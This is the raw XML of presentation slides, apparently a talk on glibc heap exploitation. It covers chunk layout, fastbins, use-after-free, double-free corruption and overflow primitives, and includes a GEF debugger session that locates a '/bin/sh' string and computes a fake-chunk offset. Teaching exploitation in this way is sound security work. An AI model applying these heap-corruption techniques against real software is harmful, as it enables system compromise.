                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85514B62-8DD3-4B4E-A8BA-68F337CED602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7" name="Flèche : chevron 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B20A293F-DB8F-49F4-883D-97E9678C673F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28" name="Flèche : chevron 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A78C6A0-B04B-4B08-9D43-E671C028C818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4085662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A30FC7-0A13-4E2C-9694-04EF051A4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1F5BD7-1045-4EF3-A7E4-1D4C675C3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9" b="19152"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3866954" y="1700808"/>
            <a:ext cx="8325046" cy="515719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63A3C6F-0904-4988-A4B8-F35C44ABC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700808"/>
            <a:ext cx="3496163" cy="8192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704EF5-0E67-48C3-98C9-F9344D973452}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3792307" y="2620680"/>
            <a:ext cx="1328373" cy="232256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5C4B3F-A40B-433F-BD61-334736C13763}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3781666" y="1700808"/>
            <a:ext cx="3034414" cy="232256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3ED9CD9-7BC8-4BA7-BE16-9E180E518A37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2567608" y="2204864"/>
            <a:ext cx="1224699" cy="5319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D849AE0-86C3-41E5-A197-84A1BC79330D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3866954" y="5949280"/>
            <a:ext cx="3309166" cy="232256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F697E14-C760-49F0-AE1F-2EF30E4FB66F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1240217" y="2520072"/>
            <a:ext cx="2505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0x7dc = 2000 + 12</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Flèche : chevron 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0858AA3-7E09-4B84-8B96-6997EF94B339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Flèche : chevron 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FFD91C8-2799-4EAC-A6CF-1D0BFF638C24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14" name="Flèche : chevron 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9710F15-EFD7-483D-AC1F-B33B95A5ED65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5" name="Flèche : chevron 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF4594E8-2476-4C73-8AB2-DC5E68502867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" name="Flèche : chevron 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F1CF0ED-6331-4F69-9918-A7435B902E4B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17" name="Flèche : chevron 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F00120F6-6775-46CB-AEAB-EC1E7B320F0F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87EECA2-ECEE-4420-ABAE-877B07C0B96F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171257" y="6301566"/>
            <a:ext cx="740167" cy="43204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x64</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109394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Heap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predictable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857" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1559496" y="1772816"/>
            <a:ext cx="4104456" cy="492364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960096" y="1772816"/>
            <a:ext cx="41764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$ ./main </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>a=0x585aa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008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>b=0x585aa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018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>c=0x585aa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028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$ ./main </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>a=0x56c80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008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>b=0x56c80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018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>c=0x56c80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028</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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75602" y="5229200"/>
            <a:ext cx="129614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287252" y="5229200"/>
            <a:ext cx="1296144" cy="7200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98902" y="5229200"/>
            <a:ext cx="1296144" cy="7200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132004" y="460900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0x56c80008</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRP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D562506F-AC46-4595-98A0-D3CE1488433C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Memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>layout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1481EE6F-3149-4AD3-8668-16D088F6376C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malloc,free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>calloc,realloc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Flèche : chevron 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32E6D605-E97F-41FB-935C-305BAE57480E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Exploitation primitive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Flèche : chevron 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEBCBC26-FE8E-487B-9847-3896A6EA655B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is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predictable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" name="Flèche : chevron 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45571988-5B52-45CB-BF64-CA4AFE4E0406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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nutshell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0" name="Flèche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123E70C3-CA86-43B2-B96E-1D9E799E8ABC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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nutshell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7687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F341EB-0CBD-4327-ACEF-90866B84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 free corruption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4198188-9195-4F94-9867-74CDAD87D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72816"/>
            <a:ext cx="5057594" cy="331236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F5CAFF4-B37A-4F81-9767-98D63E47A9BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="1340768"/>
            <a:ext cx="55919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latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>➤  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>x/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>cakelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x6020a0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>cakelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&gt;:    0x0000000000604020</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>➤  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>x/s 0x0000000000604028</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>0x604028:       "/bin/sh"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>➤  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>!python -c '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 0x604028-12'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>6307868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A5F1796-EF42-4DC0-92BD-8C41B5BA7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0308" y="5104234"/>
            <a:ext cx="8029551" cy="142162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84607E0-7F93-4766-9E34-5F717BF88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2171700"/>
            <a:ext cx="4762500" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Flèche : chevron 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC981987-336C-428B-8CDF-63FCA0235685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Trivial </a:t>
            </a:r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overflow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8CDB6B2C-C78B-4F3A-921D-2E261E97744B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Uninitialized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> variable</a:t>
            </a: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3A31F25F-D928-4872-A2D9-406FFD48135B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Fastbins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1DE4D508-ABCF-4761-808C-66AAE97297F8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GEF : GDB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enhanced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Features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Flèche : chevron 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85B3E117-91AF-4B2B-8CE5-6E124DB0F85D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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Flèche : chevron 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{713948E6-1879-487E-A630-465C6042B2AE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Double free corruption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105154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F6E444-9214-437D-A1FC-13E4EE4C9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Some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> bytes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow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8C9CFB-D4EF-47FF-A300-62CBFB9A298E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3719736" y="2132856"/>
            <a:ext cx="576064" cy="129614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>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>size=0xb8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4FF15-15F8-4EB5-BEFA-55E2FB42E8E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4295800" y="2132856"/>
            <a:ext cx="1800200" cy="129614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32401F-BD47-479C-BC1C-FB4C2C9F33B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6672064" y="2132856"/>
            <a:ext cx="1800200" cy="129614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74F2BC-B618-4937-AFBA-AEAAFA07BCEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2132856"/>
            <a:ext cx="576064" cy="129614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>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>size=0xb8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8A1E47-0BEF-4021-8871-EA764DD51E98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472264" y="2132856"/>
            <a:ext cx="576064" cy="129614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>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>size=0xb8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3506C2-642D-4973-8A5A-C91FB3041B7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9048328" y="2132856"/>
            <a:ext cx="1800200" cy="129614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DE611C-C287-403C-9B75-60446F9696E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919536" y="2132856"/>
            <a:ext cx="1800200" cy="129614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F8A103-BCB1-47E1-8DB9-46E8DF53031B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3719736" y="3929014"/>
            <a:ext cx="576064" cy="129614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+mj-lt"/>
              </a:rPr>
              <a:t>size=170h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A792A0-B619-4580-8C39-5CAC40BEAEA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4295800" y="3929014"/>
            <a:ext cx="1800200" cy="129614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B8B241-370C-4AB9-A19E-CC48A87E255C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6672064" y="3929014"/>
            <a:ext cx="1800200" cy="129614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F1FD71-7D22-4394-AD47-53D3E1B4958B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3929014"/>
            <a:ext cx="576064" cy="129614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>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>size=0xb8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5DBA95-112D-43B5-8394-63EF0A9B0AD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472264" y="3929014"/>
            <a:ext cx="576064" cy="129614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>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>size=0xb8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512552-CB9B-4B6E-B5EA-89CB91A2B8F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9048328" y="3929014"/>
            <a:ext cx="1800200" cy="129614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B47E39-EF69-440A-9A6A-FA8C67A32B7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919536" y="3929014"/>
            <a:ext cx="1800200" cy="129614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B668AE4B-1F6D-4C4E-8602-715E8B08C81C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2999656" y="2656213"/>
            <a:ext cx="864096" cy="28803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486CDE5-BDA4-4F9E-B9FE-E33E65FD02A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3719736" y="5445224"/>
            <a:ext cx="475252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8B30344-10FC-4256-80E5-C84FED9B1EAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3719736" y="3573016"/>
            <a:ext cx="237626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567482B-3BDA-404B-ADFE-6B6CE886F960}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3573016"/>
            <a:ext cx="237626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96D9B7C5-6F92-48DD-B27C-A2AD569C9350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472264" y="3573016"/>
            <a:ext cx="237626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DB126E8-F214-4C5E-B819-9F68C751BA66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472264" y="5445224"/>
            <a:ext cx="237626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6A3261C5-B35F-447D-9E5C-F763D76D0302}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4293096"/>
            <a:ext cx="1919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1.0xb8 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>   =&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>  0x170</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17342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4A0FA-B0BA-4024-844A-0CD36B560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Some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> bytes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow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0B0898-B4D0-4019-8A7A-A0F197E63AEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3719736" y="3929014"/>
            <a:ext cx="576064" cy="129614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size=170h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E9690E-A10B-4C78-BF8A-3F0DFCF8127E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4295800" y="3929014"/>
            <a:ext cx="1800200" cy="129614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A43BD7-3A06-44AF-B996-E88FBE6ABAAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6672064" y="3929014"/>
            <a:ext cx="180020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F4EFCA-E762-49F4-A642-4952F72276B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3929014"/>
            <a:ext cx="576064" cy="12961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>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>size=0xb8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88077F-10DF-47F5-B063-86E3FE0C0BA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472264" y="3929014"/>
            <a:ext cx="576064" cy="129614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>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>size=0xb8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CF4053-CFCB-424B-8733-1759A5094A54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9048328" y="3929014"/>
            <a:ext cx="1800200" cy="129614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EBAEB7-16F5-4F90-A826-FF8A9462DD76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919536" y="3929014"/>
            <a:ext cx="1800200" cy="129614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91243B9-3FC9-43D6-A4F7-483001C54680}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3719736" y="5445224"/>
            <a:ext cx="475252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3E3E65F-106A-4A37-95D8-F20A9961FEF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472264" y="5445224"/>
            <a:ext cx="237626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3887FA3-7830-4BB0-81AB-453D84A0CF9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3719736" y="1893941"/>
            <a:ext cx="576064" cy="1296144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+mj-lt"/>
              </a:rPr>
              <a:t>size=170h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A19249-ABD8-49E0-AE25-AD3AAACA2893}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6672064" y="1893941"/>
            <a:ext cx="180020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6537A0-6FE0-4A38-8F47-4F5267F809DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1893941"/>
            <a:ext cx="576064" cy="12961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>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>size=0xb8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BE3C91-B0A5-470B-AD3A-4EF3B6567355}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472264" y="1893941"/>
            <a:ext cx="576064" cy="129614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>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>size=0xb8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5A8F47-A5B9-47F9-845A-E0527E2FE532}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
